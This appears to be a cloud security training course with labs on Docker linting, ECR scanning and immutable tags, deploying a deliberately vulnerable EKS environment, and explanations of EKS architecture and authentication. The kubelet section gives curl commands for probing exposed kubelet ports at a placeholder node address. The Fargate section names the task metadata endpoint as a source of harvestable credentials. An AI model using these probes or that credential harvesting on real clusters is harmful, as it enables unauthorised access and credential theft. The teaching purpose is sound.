Benefits of SAST for Docker Containers

  • Identifies vulnerabilities before deployment, reducing risks in production.
  • Ensures compliance with security standards and best practices.
  • Saves time and effort by catching issues early in the development lifecycle.

Hands-On Lab: Docker Static Analysis with Dockle and Hadolint


Dockle: Setup, Usage, and Cleanup

  • Change the directory.

    cd /workspaces/ecr_eks_security_masterclass_public/docker-lab
    
  • Download and install the latest version of Dockle on Debian/Ubuntu:

    VERSION=$(curl --silent "https://api.github.com/repos/goodwithtech/dockle/releases/latest" | grep '"tag_name":' | sed -E 's/.*"v([^"]+)".*/\1/' ) && curl -L -o dockle.deb https://github.com/goodwithtech/dockle/releases/download/v${VERSION}/dockle_${VERSION}_Linux-64bit.deb
    
    sudo dpkg -i dockle.deb && rm dockle.deb
    
  • Pull a sample Docker image:

    docker pull nginx:latest
    
  • Run Dockle on the pulled Docker image:

    dockle nginx:latest
    

Review the report for vulnerabilities and misconfigurations.

Hadolint: Setup, Usage, and Cleanup

  • Install Hadolint as a Docker container:

    docker pull hadolint/hadolint
    
  • Create a sample Dockerfile:

    cat <<EOF > Dockerfile
    FROM nginx:latest
    RUN apt-get update && apt-get install -y curl
    CMD ["nginx", "-g", "daemon off;"]
    EOF
    
  • Run Hadolint on the Dockerfile.

    docker run --rm -i hadolint/hadolint < Dockerfile
    
  • Ignore specific linting rules.

    cat Dockerfile | docker run --rm -i hadolint/hadolint hadolint --ignore DL3008 -
    

Cleanup Dockle

  • Remove the Docker image:

    docker rmi nginx:latest
    
  • Uninstall Dockle if not needed:

    sudo apt remove dockle
    

Cleanup Hadolint

  • Remove the Dockerfile:

    rm Dockerfile
    
  • Remove the Hadolint Docker image:

    docker rmi hadolint/hadolint
    

Hands-On Lab: Docker Security Checks with Docker Bench Security

Prerequisites

  • Docker installed on your system.
  • git installed for cloning repositories.

Hands-On Lab

Setup Docker Bench Security

  • Change to your desired working directory:

    cd /workspaces/ecr_eks_security_masterclass_public/docker-lab
    
  • Clone the Docker Bench Security repository:

    git clone https://github.com/docker/docker-bench-security.git
    
  • Navigate into the cloned repository:

    cd docker-bench-security
    
  • Make the main script executable:

    chmod +x docker-bench-security.sh
    
  • Run the script to analyze your Docker environment:

    sudo ./docker-bench-security.sh
    

Review the output.

Cleanup Docker Bench Security

  • Remove the cloned repository:
    cd ..
    rm -rf docker-bench-security
    

Cleanup the running containers & images.

  • Remove all running and stopped containers.

    docker rm -f $(docker ps -aq)
    
  • Remove all images.

    docker rmi -f $(docker images -aq)
    

Note: Aqua Security's Docker Bench for Security is outdated and is a fork of Docker's Docker Bench for Security. Therefore, we are using the original repository.

Introduction to AWS Elastic Container Registry (ECR)


Image Credit: https://aws.amazon.com/ecr/

What is Amazon ECR?

  • Amazon Elastic Container Registry (ECR) is a fully managed container registry service by AWS.
  • It enables users to store, manage, share, and deploy container images and artifacts efficiently.
  • ECR eliminates the need to manage container registry infrastructure, reducing operational overhead.

Key Features of Amazon ECR

  • Fully managed by AWS, ensuring scalability and reliability.
  • Supports Docker and Open Container Initiative (OCI) images.
  • Simplifies the deployment of container images across AWS services and other platforms.
  • Provides both public and private repositories for flexibility.

Benefits of Amazon ECR

  • Integration with AWS services such as ECS, EKS, and Fargate.
  • Designed for high availability and durability of container images.
  • Ensures secure storage with encryption for data at rest and in transit.
  • Uses AWS IAM for fine-grained access control to repositories.
  • Provides image scanning to identify vulnerabilities in container images.
  • Allows cross-region and cross-account replication for distributed workloads.

Security Features of Amazon ECR

  • IAM policies and repository policies for access control.
  • Lifecycle policies to automate image retention and reduce costs.
  • Image scanning for vulnerabilities using CVE databases, via basic scanning (Clair) or enhanced scanning (Amazon Inspector).
  • Immutable tags to prevent overwriting of critical container images.
  • Cross-region and cross-account replication to distribute workloads securely.
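
Of the features above, lifecycle policies are the one not exercised in the labs that follow, so here is a minimal sketch that expires untagged images after 14 days (the repository name is a placeholder):

    aws ecr put-lifecycle-policy \
      --repository-name my-repo \
      --lifecycle-policy-text '{
        "rules": [{
          "rulePriority": 1,
          "description": "Expire untagged images older than 14 days",
          "selection": {
            "tagStatus": "untagged",
            "countType": "sinceImagePushed",
            "countUnit": "days",
            "countNumber": 14
          },
          "action": { "type": "expire" }
        }]
      }'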

Public vs. Private Repositories

  • Private repositories store container images securely and require authentication for push/pull operations.
  • Public repositories share container images publicly and require authentication only for pushing images.

Monitoring and Logging

  • Integration with AWS CloudTrail to log API calls and events for auditing.
  • Event notifications via Amazon EventBridge to track image pushes, deletions, and scan results.

Common Use Cases

  • Store and deploy container images for microservices in ECS or EKS.
  • Share container images publicly using ECR Public.
  • Securely push images from CI/CD pipelines for reliable deployments.

Lab: AWS ECR Image Scanning for Vulnerabilities

Prerequisites

Configure AWS CLI

  • Configure AWS CLI with your credentials:
    aws configure
    
    • Provide AWS Access Key ID, Secret Access Key, Default region (e.g., us-west-2), and Default output format (e.g., json).

Hands on Lab

  • Change the directory.

    cd /workspaces/ecr_eks_security_masterclass_public/docker-lab
    
  • Fetch your AWS Account ID:

    ACCOUNT_ID=$(aws sts get-caller-identity --query Account --output text)
    
  • Create a new repository in Amazon ECR.

    aws ecr create-repository --repository-name k8svillage-ecr-repo --region us-west-2 --image-scanning-configuration scanOnPush=true
    
  • Verify the repository creation:

    aws ecr describe-repositories --repository-name k8svillage-ecr-repo --region us-west-2
    
  • Log in to your ECR registry.

    aws ecr get-login-password --region us-west-2 | docker login --username AWS --password-stdin ${ACCOUNT_ID}.dkr.ecr.us-west-2.amazonaws.com
    
  • Create a sample Dockerfile for building the image.

    cat <<EOF > Dockerfile
    FROM ubuntu:latest
    ENV DEBIAN_FRONTEND=noninteractive
    RUN apt-get update && apt-get install -y curl && apt-get clean
    CMD ["bash"]
    EOF
    
  • Build the Docker image:

    docker build -t k8svillage-ecr-repo .
    
  • Tag the Docker image for ECR:

    docker tag k8svillage-ecr-repo:latest ${ACCOUNT_ID}.dkr.ecr.us-west-2.amazonaws.com/k8svillage-ecr-repo:latest
    
  • Push the Docker image to ECR:

    docker push ${ACCOUNT_ID}.dkr.ecr.us-west-2.amazonaws.com/k8svillage-ecr-repo:latest
    
  • Retrieve the image digest dynamically to verify the results.

    IMAGE_DIGEST=$(aws ecr describe-images --repository-name k8svillage-ecr-repo --region us-west-2 --query 'imageDetails[0].imageDigest' --output text)
    
  • Retrieve scan findings.

    aws ecr describe-image-scan-findings --repository-name k8svillage-ecr-repo --image-id imageDigest=${IMAGE_DIGEST} --region us-west-2
    

In case of an error in the scan, try another region.
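
The full findings output is verbose; if you only need a summary, the same API call can return just the per-severity counts via a --query filter (a sketch reusing the variables set above):

    aws ecr describe-image-scan-findings \
      --repository-name k8svillage-ecr-repo \
      --image-id imageDigest=${IMAGE_DIGEST} \
      --region us-west-2 \
      --query 'imageScanFindings.findingSeverityCounts'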

Optional: View Scan Results in AWS Console

  • Navigate to the Amazon ECR service in the AWS Management Console.
  • Select your repository, then select the image.
  • Click on Vulnerabilities to view detailed scan results.

Clean Up Resources

  • Delete the ECR repository:

    aws ecr delete-repository --repository-name k8svillage-ecr-repo --region us-west-2 --force
    
  • Remove the Docker image locally:

    docker rmi ${ACCOUNT_ID}.dkr.ecr.us-west-2.amazonaws.com/k8svillage-ecr-repo:latest
    
  • Delete the Dockerfile:

    rm Dockerfile
    

Note: If you hit the error StartImageScan seems to be disabled when Enhanced scanning is enabled, see repost.aws.

Lab: AWS ECR Immutable Image Tag

Prerequisites

Configure AWS CLI

  • Configure AWS CLI with your credentials:
    aws configure
    
    • Provide AWS Access Key ID, Secret Access Key, Default region (e.g., us-east-1), and Default output format (e.g., json).

Hands-on Lab

  • Change the directory.

    cd /workspaces/ecr_eks_security_masterclass_public/docker-lab
    
  • Fetch your AWS Account ID:

    ACCOUNT_ID=$(aws sts get-caller-identity --query Account --output text)
    
  • Create an ECR repository with an immutable image tag policy:

    aws ecr create-repository --repository-name immutable-repo --region us-east-1 --image-tag-mutability IMMUTABLE
    
  • Verify the repository creation:

    aws ecr describe-repositories --repository-name immutable-repo --region us-east-1
    
  • Log in to your ECR registry:

    aws ecr get-login-password --region us-east-1 | docker login --username AWS --password-stdin ${ACCOUNT_ID}.dkr.ecr.us-east-1.amazonaws.com
    
  • Create a sample Dockerfile:

    cat <<EOF > Dockerfile
    FROM alpine:latest
    RUN apk add --no-cache curl
    CMD ["sh"]
    EOF
    
  • Build the Docker image:

    docker build -t immutable-repo .
    
  • Tag the Docker image for ECR:

    docker tag immutable-repo:latest ${ACCOUNT_ID}.dkr.ecr.us-east-1.amazonaws.com/immutable-repo:1.0.0
    
  • Push the Docker image to ECR:

    docker push ${ACCOUNT_ID}.dkr.ecr.us-east-1.amazonaws.com/immutable-repo:1.0.0
    
  • Try pushing another image with the same tag to test the immutability:

    docker push ${ACCOUNT_ID}.dkr.ecr.us-east-1.amazonaws.com/immutable-repo:1.0.0
    
  • Now check for immutability.

  • Change the CMD or add/remove a line to create a new layer:

    sed -i 's/sh/bash/' Dockerfile
    
  • Rebuild the image with changes.

    cat Dockerfile
    
    docker build --no-cache -t immutable-repo .
    
  • Tag and attempt to push the modified image.

    docker tag immutable-repo:latest ${ACCOUNT_ID}.dkr.ecr.us-east-1.amazonaws.com/immutable-repo:1.0.0
    
    docker push ${ACCOUNT_ID}.dkr.ecr.us-east-1.amazonaws.com/immutable-repo:1.0.0
    

There should be an error indicating that the tag is immutable:

tag invalid: The image tag '1.0.0' already exists in the 'immutable-repo' repository and cannot be overwritten because the repository is immutable.


Optional: View Repository in AWS Console

  • Navigate to the Amazon ECR service in the AWS Management Console.
  • Select your repository (immutable-repo).
  • Verify the images and the immutable tag policy.

Clean Up Resources

  • Delete the ECR repository and all its contents:

    aws ecr delete-repository --repository-name immutable-repo --region us-east-1 --force
    
  • Remove the Docker image locally:

    docker rmi ${ACCOUNT_ID}.dkr.ecr.us-east-1.amazonaws.com/immutable-repo:1.0.0
    
  • Delete the Dockerfile:

    rm Dockerfile
    

Introduction to EKS & Key AWS EKS Components

Amazon Elastic Kubernetes Service (EKS) is a managed service that simplifies Kubernetes deployments. Below, we will explore the key components of EKS and how to manage access securely.

What is AWS EKS?

  • Amazon Elastic Kubernetes Service (EKS) is a fully managed service that simplifies Kubernetes deployment, management, and scaling on AWS. It enables developers to run Kubernetes clusters without worrying about the complexity of managing the underlying infrastructure.

  • EKS automates much of the administrative tasks, such as monitoring, scaling, and patching the control plane, so you can focus on deploying and scaling your applications.

  • Key Benefits of EKS:

    • Fully Managed: AWS handles all the heavy lifting of managing the Kubernetes control plane.
    • High Availability: EKS is designed to be highly available, running across multiple Availability Zones (AZs).
    • Scalability: EKS can scale up and down based on the needs of your application.

Now, let’s dive into the core components that make EKS work.

Components of AWS EKS

  • EKS Control Plane

    • The Control Plane is the heart of the EKS service and is fully managed by AWS. It consists of multiple services distributed across three AWS Availability Zones, which ensures redundancy and high availability.

    • Responsibilities of the Control Plane:

    • Kubernetes API Server: This is the entry point for interacting with your cluster. All commands and communications from your applications go through the API server.

    • ETCD: A key-value store where Kubernetes stores all cluster data. This is critical for keeping the cluster in sync across nodes.

    • Controller Manager: Ensures that the state of your application matches the desired state. For example, if a pod goes down, the controller ensures it’s restarted.

    • Scheduler: Decides which node will run a specific pod, optimizing resource usage.

The control plane also manages the networking between your pods and handles load balancing between nodes.

  • EKS Data Plane

    • The Data Plane is where your workloads (applications and services) run. This consists of Amazon EC2 instances that serve as worker nodes. You can choose the instance type that fits your workload, and EKS manages communication between the control plane and these worker nodes.
    • Flexible Scaling: The data plane scales with demand, allowing you to increase or decrease the number of EC2 instances based on the current workload.
    • Integration with AWS Services: EKS integrates with AWS services like Elastic Load Balancer (ELB) and Auto Scaling Groups, which automatically manage traffic and adjust node size.
    • Worker Nodes (The data plane in EKS is essentially made up of the worker nodes):
      • Each worker node is an EC2 instance that runs the Kubernetes components needed to manage your workloads, such as the kubelet, which communicates with the API server.
      • These nodes are responsible for running your application pods.
  • Fargate for EKS (Serverless Option)

    • Fargate is AWS’s serverless compute option for EKS, which eliminates the need to manage EC2 instances for running Kubernetes pods. With Fargate, you specify the resources your pods need (CPU, memory), and AWS automatically provisions and manages the infrastructure.

    • Advantages of Fargate:

    • No Node Management: You don't need to worry about managing or scaling EC2 instances.

    • Cost-Efficient: You only pay for the resources your application uses.

    • Serverless Architecture: Fargate automatically scales based on your application’s requirements.

  • EKS Networking and Load Balancing

    • Networking is crucial in EKS, as it controls how pods communicate with each other and external services.

    • Key Components:

      • Kubernetes Networking: Each pod in EKS gets its own IP address, which allows for direct communication between pods without network address translation (NAT).
      • Elastic Load Balancer (ELB): EKS integrates with AWS’s Elastic Load Balancer to distribute incoming traffic across your worker nodes. This ensures high availability and smooth user experience even during traffic spikes.
  • Load Balancer Example:

    • You can set up an ALB (Application Load Balancer) to route traffic between your pods based on a specific rule, such as URL path.
  • EKS Security and IAM

    • Security in EKS is achieved through a combination of AWS Identity and Access Management (IAM) and Kubernetes Role-Based Access Control (RBAC). This ensures fine-grained control over who can access your Kubernetes resources.

    • Key Security Features:

      • IAM for Pods (IRSA): IAM Roles for Service Accounts (IRSA) enable you to assign IAM roles to Kubernetes pods, allowing them to securely access AWS services.

      • RBAC: Kubernetes RBAC restricts which users and pods can perform certain actions on resources within the cluster.

      • Example: IAM Role for Pods (IRSA); a CLI sketch with eksctl follows at the end of this section.

        • Create an IAM role with the required permissions (e.g., access to an S3 bucket).
        • Associate the IAM role with a Kubernetes service account.
        • The pod will automatically assume this role and gain access to the required AWS service.
  • EKS Storage Options

    • EKS offers multiple storage options, depending on the type of data you need to store:

      • Ephemeral Storage: Temporary data tied to the pod’s lifecycle.
      • Amazon EBS (Elastic Block Store): Persistent storage volumes for stateful applications, such as databases.
      • Amazon EFS (Elastic File System): Scalable file storage for applications needing shared access to files.

These storage solutions integrate seamlessly with EKS and provide flexibility based on your needs.

  • Monitoring and Observability

    • EKS integrates with AWS services like CloudWatch and GuardDuty to provide monitoring, logging, and security threat detection for your cluster.

    • Monitoring Tools:

      • Amazon CloudWatch: Monitor metrics such as CPU usage, memory, and network traffic.
      • Amazon GuardDuty: Detect suspicious activity, like unauthorized access to your cluster or node misconfigurations.
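
As promised in the IRSA example above, here is a hedged CLI sketch of how that flow is commonly wired up with eksctl, which creates the IAM role, its trust policy against the cluster's OIDC provider, and the annotated service account in one step (cluster name, namespace, service account name, and policy ARN are placeholders):

    # One-time setup: associate an OIDC identity provider with the cluster
    eksctl utils associate-iam-oidc-provider --cluster my-cluster --approve

    # Create an IAM role and a Kubernetes service account bound together
    eksctl create iamserviceaccount \
      --cluster my-cluster \
      --namespace default \
      --name s3-reader \
      --attach-policy-arn arn:aws:iam::aws:policy/AmazonS3ReadOnlyAccess \
      --approve

Pods that run under the s3-reader service account then receive short-lived credentials for the role through a projected web identity token, with no static AWS keys stored in the pod.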

Lab: Deploying a Vulnerable AWS EKS Infrastructure

In this lab, you will deploy a vulnerable AWS EKS infrastructure. The following steps will guide you through setting up the infrastructure using a bash script.

Step-by-Step Guide

  • Navigate to the EKS Directory:
cd /workspaces/ecr_eks_security_masterclass_public/eks/

Ensure you have administrative privileges by configuring the AWS CLI using aws configure with your access and secret keys.

  • Input the following information:

    • AWS Access Key ID
    • AWS Secret Access Key
    • Default region name (set to us-west-2 or us-east-1 based on your region)
    • Default output format (choose json)
  • Validate AWS Administrative Privileges:

    • Use the AWS STS (Security Token Service) to verify your identity and ensure you have the necessary permissions.
    aws sts get-caller-identity
    


Ensure that the AWS CLI is properly configured and that you have administrative privileges to deploy EKS clusters.

  • Run the Deployment Script:

    • Deploy the vulnerable EKS infrastructure by running the deploy.sh script. You can specify a region using the --region flag. If no region is specified, it will default to us-west-2.
    bash deploy.sh --region us-west-2
    

    alt text

    To select a different region, replace us-west-2 with the desired region, such as us-east-1. Currently, only us-east-1 and us-west-2 are supported.

  • Confirmation Prompt:

    • You will receive a confirmation prompt:
    Do you want to continue with the deployment? (Y/N)
    
    • Type Y to proceed with the deployment.

    alt text

  • Deployment Process:

    • The deployment process may take up to 15 minutes as it provisions the EKS cluster and associated resources.

    alt text

  • Final Output:

    • After the deployment is complete, review the summary of the deployment, along with the command for accessing the deployed EKS cluster.

    alt text

  • Access the Vulnerable Application:

    • After the deployment, you can access the vulnerable application via the public IP of the EC2 instance:
      echo "Access the application at: http://$(jq -r '.instance_public_ip.value' < ec2_output.json)"
      
  • Configure the EKS Cluster.

    echo "Authenticate to EKS cluster via: aws eks update-kubeconfig --region $(grep 'ECR Repository URL' deployment_output.txt | awk -F'.' '{print $4}') --name $(grep 'EKS Cluster Name' deployment_output.txt | awk '{print $4}')"
    
    

    alt text

Refer to this video for a detailed walkthrough

Kubernetes Architecture

This section explains the architecture and key components of Kubernetes, focusing on how the control plane and worker nodes operate together.

  • Control Plane Components:

    • kube-apiserver
    • etcd
    • kube-scheduler
    • kube-controller-manager
    • cloud-controller-manager
  • Worker Node Components:

    • kubelet
    • kube-proxy
    • Container Runtime

Note: The diagram below represents the architecture of Kubernetes clusters and components.

alt text

Control Plane

  • kube-apiserver:

    • The API server is the entry point for all administrative tasks in a Kubernetes cluster. It handles RESTful API requests from users and cluster components.
    • It performs authentication, authorization, and resource management by interfacing with etcd.
  • etcd:

    • A highly available and distributed key-value store that stores all cluster data, including the configuration, state, and metadata of Kubernetes objects like pods, services, etc.
    • It ensures that any update made to the cluster is stored and accessible across all control plane components.
  • kube-scheduler:

    • The scheduler is responsible for assigning new pods to available nodes. It considers various constraints, like resource requirements and policies, to ensure pods are efficiently placed.
  • kube-controller-manager:

    • This component runs the core control loops that watch for changes in cluster state. If the desired state does not match the actual state, it takes corrective action.
    • It manages built-in controllers like Deployment, ReplicaSet, and Job.
  • cloud-controller-manager:

    • This controller manages integration with cloud provider APIs (e.g., AWS, GCP). It ensures that resources like load balancers and storage are provisioned based on cloud-specific requirements.

Worker Nodes

  • kubelet:

    • The kubelet is the agent that runs on each worker node. It ensures containers are running in pods and reports the node and pod status to the control plane.
    • It interacts with the container runtime to manage containers.
  • kube-proxy:

    • Kube-proxy runs on every worker node to manage network rules and ensure proper routing of traffic to pods.
    • It supports communication between different services within the cluster and external traffic.
  • Container Runtime:

    • The container runtime, such as containerd or Docker, is responsible for pulling container images and managing the container lifecycle within pods.

Architecture Flow

  • User Request: When a user interacts with Kubernetes (e.g., deploying an application), they send a request to the kube-apiserver using kubectl.
  • API Server Interaction: The API server processes the request and records changes in etcd. If a new pod needs to be created, the API server passes this information to the scheduler.
  • Scheduler Action: The scheduler selects a suitable worker node and assigns the pod to it.
  • Node Operations: The kubelet on the selected worker node pulls the container image using the container runtime, starts the pod, and continuously monitors its health.
  • Networking: Kube-proxy manages the network rules to ensure the pod is accessible based on the assigned service.
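
This flow can be observed end to end with a throwaway pod (the pod name demo-nginx is arbitrary):

kubectl run demo-nginx --image=nginx   # request hits the kube-apiserver
kubectl get pod demo-nginx -o wide     # shows which node the scheduler picked
kubectl describe pod demo-nginx        # events show scheduling, image pull, and container start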


Important AWS EKS Terminologies

Understanding key terminologies in Amazon EKS is essential for working with the platform effectively. Below, we explain each term, including edge cases and potential issues you might encounter in real-world scenarios.

  • 1. Cluster

    An EKS Cluster is the core of your EKS environment, containing all the resources needed to run your Kubernetes workloads.

    • Edge Case: Cluster Not Accessible:
      • If the control plane is down or misconfigured, the cluster might become inaccessible. You won’t be able to interact with Kubernetes resources using the kubectl command, and the Kubernetes API may not respond.
    • Explanation:
      • Always configure proper network access (public or private endpoints) to your cluster.
      • Ensure that IAM roles are properly set up for kubectl access.
  • Possible Attack Scenario: Misconfigured network access to the control plane or IAM roles.
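
    For example, the endpoint exposure can be checked from the CLI (a sketch; the cluster name is hypothetical):

    aws eks describe-cluster --name my-eks-cluster \
      --query 'cluster.resourcesVpcConfig.{public:endpointPublicAccess,private:endpointPrivateAccess,cidrs:publicAccessCidrs}'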

  • 2. Node

    A Node is a worker machine, typically an EC2 instance, that runs your application pods.

    • Edge Case: Node Not Joining the Cluster:

      • Sometimes, a node might fail to join the cluster, leading to resource shortages. This can happen due to misconfigured security groups, missing IAM roles, or incorrect bootstrap scripts.
    • Explanation:

      • Ensure correct IAM roles and security groups for worker nodes.
      • Always validate the bootstrap process for each node.
    • Possible Attack Scenario: If IAM roles are not attached properly or security groups block communication between nodes and the control plane, nodes won't join.

  • 3. Pod

    A Pod is the smallest deployable unit in Kubernetes and can contain one or more containers.

    • Edge Case: Pod Not Scheduling:

      • A pod may not schedule on a node due to insufficient resources (CPU or memory), taints, or affinity rules.
    • Explanation:

      • Always monitor resource utilization and ensure enough capacity for new pods.
      • Check taints and tolerations that might block certain pods from being scheduled on nodes.
    • Possible Attack Scenario: Resource limits on nodes or scheduling rules misconfigured by an attacker can prevent pods from running.

  • 4. Control Plane

    The Control Plane in EKS is managed by AWS and includes critical components like the API server, scheduler, and etcd.

    • Edge Case: Control Plane Not Accessible:

      • You might face scenarios where the control plane is not accessible due to network configuration issues or IAM role misconfigurations. This can make your cluster unreachable.
    • Explanation:

      • Always ensure that the control plane endpoint (public or private) is configured correctly.
      • Verify IAM roles and policies to allow access to the Kubernetes API server.
    • Possible Attack Scenario: An attacker could abuse misconfigured VPC or endpoint access settings, or modify IAM policies to deny access to the control plane.

  • 5. Kubelet

    The kubelet is an agent that runs on each node, ensuring the containers are running as expected.

    • Edge Case: Kubelet Not Communicating with the API Server:

      • If the kubelet fails to communicate with the API server, the node might become NotReady, meaning it won’t accept new pods.
    • Explanation:

      • Check network connectivity between the node and the control plane.
      • Ensure the kubelet service is running and has sufficient permissions.
    • Possible Attack Scenario: The kubelet listens on port 10250 (and, on older clusters, the read-only port 10255). If the node is public and open to 0.0.0.0/0, the kubelet API may be directly reachable on these ports. In addition, if the nodes/proxy permission is granted, an attacker can control the kubelet and access any pod on the node.
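
      As a quick illustration, an attacker with network access to a node might probe the kubelet ports like this (NODE_IP is a placeholder; a hardened cluster should return 401 or refuse the connection):

      curl -sk https://NODE_IP:10250/pods   # authenticated kubelet API
      curl -s http://NODE_IP:10255/pods     # legacy read-only port, if still enabled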

  • 6. Kubernetes API Server

    The API Server is the central communication hub of the Kubernetes cluster.

    • Edge Case: API Server Rate Limits:

      • If there are too many requests, the API server might hit rate limits, leading to 503 errors or delayed responses.
    • Explanation:

      • Use rate limiting and caching for monitoring tools to avoid overloading the API server.
      • Monitor API server logs for signs of rate limiting.
    • Possible Attack Scenario: A publicly exposed API server can be abused by an attacker if the cluster config is leaked or a user is compromised.

  • 7. IAM (Identity and Access Management)

    IAM is used to manage who can access your cluster and what actions they can perform.

    • Edge Case: IAM Role Misconfiguration:

      • If an IAM role is missing required permissions, users might not be able to access the EKS cluster or resources within it, leading to access denied errors.
    • Explanation:

      • Always ensure that IAM roles are properly configured with the correct policies.
      • Regularly audit your IAM roles to prevent over-permissive access.
    • Possible Attack Scenario: Incorrectly configured IAM policies can lead to privilege escalation. This applies from the AWS perspective.

  • 8. RBAC (Role-Based Access Control)

    RBAC controls access to Kubernetes resources based on the roles assigned to users and applications.

    • Edge Case: Over-Permissioned Roles:

      • A common misconfiguration is assigning overly broad permissions through ClusterRoleBindings, leading to privilege escalation risks.
    • Explanation:

      • Implement the principle of least privilege when configuring RBAC.
      • Regularly review RBAC configurations to ensure that roles are not over-permissioned.
    • Possible Attack Scenario: Misconfigured RBAC that grants excessive access to service accounts or users. This applies from the cluster perspective.
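
      A quick audit sketch for spotting over-permissioned bindings, using standard kubectl commands:

      kubectl get clusterrolebindings -o wide | grep cluster-admin
      kubectl auth can-i --list --as=system:serviceaccount:default:default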

  • 9. Fargate

    Fargate allows you to run containers in EKS without managing the underlying infrastructure.

    • Edge Case: Fargate Pod Limits:

      • Fargate has certain limitations, such as pod memory and CPU limits. If a pod exceeds these limits, it may not schedule or could be evicted.
    • Explanation:

      • Ensure your pod's resource requests and limits are within Fargate's allowed range.
      • Monitor resource usage to avoid evictions.
    • Possible Attack Scenario: Because Fargate is serverless, misconfigured resource requests can exceed its limits. An attacker with RCE inside a Fargate task can also query the task metadata endpoint at http://169.254.170.2/v2/metadata/ to harvest credentials.

Credits:

  • https://aws.amazon.com/eks/
  • https://securitylabs.datadoghq.com/articles/amazon-eks-attacking-securing-cloud-identities/

AWS EKS Authentication & Authorization

Introduction to Authentication and Authorization in EKS

  • Authentication: Verifies who the user is. In AWS EKS, this is managed through AWS Identity and Access Management (IAM) or OpenID Connect (OIDC) providers.
  • Authorization: Determines what actions the authenticated user can perform within the EKS cluster. This is managed through Kubernetes Role-Based Access Control (RBAC).

AWS EKS Authentication

  • Types of Identities in EKS:

    • AWS IAM Principals: Users or roles that are managed through AWS IAM.
    • OIDC Users: Users authenticated through an OIDC provider (not covered in this guide).
  • EKS uses IAM to authenticate users who need access to manage clusters or perform operations on Kubernetes objects like pods, deployments, etc.

Deep Dive in Authz & Authn of EKS

  • After creating an EKS cluster, the next step is configuring kubectl for cluster access. This section explains the kubeconfig setup and how EKS verifies who is making requests to the Kubernetes API.

  • Authentication Example:

    • The AWS CLI generates a kubeconfig file with the necessary details for connecting to the API server.
    • A specific token is generated using aws eks get-token, which allows authentication with the EKS API server.
    • This token is used in HTTP requests (such as with curl) to authenticate and interact with the Kubernetes API.
  • Sample EKS Config.

Location: ~/.kube/config

apiVersion: v1
kind: Config
preferences: {}
current-context: arn:aws:eks:us-west-2:123456789012:cluster/my-eks-cluster
clusters:
- cluster:
    certificate-authority-data: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSURaRENDQXlDZ0F3SUJBZ0lJYmpKUERuejVVekFKQmdncWhrak9QUVFEQWpCek1TTUdRek0wTURFdwpPREU1TVRVd1dUUXpNalV3TmpReU5UWmpOek1HTm1Rd1l6QTJNVEV5TXprd1pEY3pNVGczTVRBd1dnWURWUVFHCkJCVEpUb2dwNEFNRUlCQ3NHQVRBY0dnMk1UUmdZR0ZNUmlDNFk5ZGdXYmVYTU1CQmZCZ3NxaGtpRzl3MEJBUTAKQUZNUVFmOXBMbjA1WklSTVBpWFRsRnlDZ29vN3Rjb1F3Q2dZSUtvWkl6ajBFQXdJRFNBQXdSUUlnTUJFRwpRQ3NnS21JRXNEd29wQ1FLS0RFTEJFSXpPUFFrRXhOZ3JqaFZFM3hRb3RMMVRzVW13ZXo5ekJxbWpNRDZKSzdlCmxiT2t1aDBwMGVucm1CUUlGTzN1dTUzM1FZRlZpQm8vM1VaN2dBZ2REWnV2blVTMUtEdnRtS2dVdTNzdmZkcWkKRFR0ckJXRHJvMldRTkVpMEVwdWpXVXg3ek10V1hPN0ZtM1cxSmFRU2VCaDhzYmtuY1AxTkFYUmVnbm1FdlMrZwoxU1ljNlJlVmVPa0JHUm5CQ2pPdVhaYnlHNDZMeUJRTDBDT0dpODZCUnNnb0tJVkRFWGNNTzZXbmhhNGdOcmF6Cm1WZ21TZkZQdEl0SkFBL2h4a2xNb0x5NDRqTXAxK1FFVzdOdW8vRFdBd2dmam9UVk9nR2dxSDZ2RnhCdStFR3gKMWNmN01tb2FkMUNxVVhNSjgvNlAzN3R2RHd4ckJZWEZMR0Ewbk9XTnJmY3NFMmx2M2NFbmdDTE1QOWV1V1RuRQpHRmZnVGp3NU5Mdz09Ci0tLS0tRU5EIENFUlRJRklDQVRFLS0tLS0K
    server: https://123456789012.gr7.us-west-2.eks.amazonaws.com
  name: arn:aws:eks:us-west-2:123456789012:cluster/my-eks-cluster
contexts:
- context:
    cluster: arn:aws:eks:us-west-2:123456789012:cluster/my-eks-cluster
    user: arn:aws:eks:us-west-2:123456789012:cluster/my-eks-cluster
  name: arn:aws:eks:us-west-2:123456789012:cluster/my-eks-cluster
users:
- name: arn:aws:eks:us-west-2:123456789012:cluster/my-eks-cluster
  user:
    exec:
      apiVersion: client.authentication.k8s.io/v1beta1
      command: aws
      args:
      - eks
      - get-token
      - --region
      - us-west-2
      - --cluster-name
      - my-eks-cluster
  • Authorization: aws-auth ConfigMap (Deprecated)

    • Previously, the aws-auth ConfigMap in EKS was used to map IAM roles to Kubernetes roles. However, this method is deprecated and has several limitations, including "shadow administrators" who have invisible privileges.

Challenges of aws-auth ConfigMap (Deprecated):

  • It's hard to know who has admin privileges.

  • Break-the-glass roles might lack access during incidents.

  • Cloud security tools may not track Kubernetes API access effectively.

    • Example: You map IAM roles in aws-auth, only to realize that hidden admin privileges (such as the cluster creator's) can't be managed or audited easily.

Under the Hood: aws-iam-authenticator

  • The aws-iam-authenticator component handles request authentication in EKS. The client sends a bearer token with each request; the API server forwards it to aws-iam-authenticator, which verifies the caller's AWS identity via the pre-signed AWS API request embedded in the token.

  • Token Structure Example:

    • The token generated for EKS authentication is a pre-signed request for sts:GetCallerIdentity.
    • Decoding the token reveals that it allows AWS to verify the caller’s identity using this URL.
  • Example: Using aws eks get-token to generate a pre-signed token, which is then decoded to show the authentication request to AWS.
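
  • A decoding sketch (the cluster name my-eks-cluster is hypothetical; the token is the literal prefix k8s-aws-v1. followed by a base64url-encoded pre-signed STS URL, so the decoder may complain about missing padding):

TOKEN=$(aws eks get-token --cluster-name my-eks-cluster --query 'status.token' --output text)
# Strip the prefix and convert base64url to standard base64 before decoding
echo "${TOKEN#k8s-aws-v1.}" | tr '_-' '/+' | base64 -d 2>/dev/null; echo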

Authorization: EKS Cluster Access Management (Recommended)

In November 2023, AWS introduced a better way to manage access to EKS clusters through AWS APIs, eliminating the drawbacks of the aws-auth ConfigMap.

  • Recommended Practice:
    • Migrating from aws-auth to the new access management feature is advised for improved security and control.

Step-by-step guide to understanding EKS authentication

  • Step 1: Create or Use an Existing IAM User or Role

    • The first step in setting up authentication is to create an IAM user or use an existing IAM role. Focus on enabling "Programmatic Access" if you only need CLI/API interaction.
  • Step 2: Attach Required Permissions to IAM User

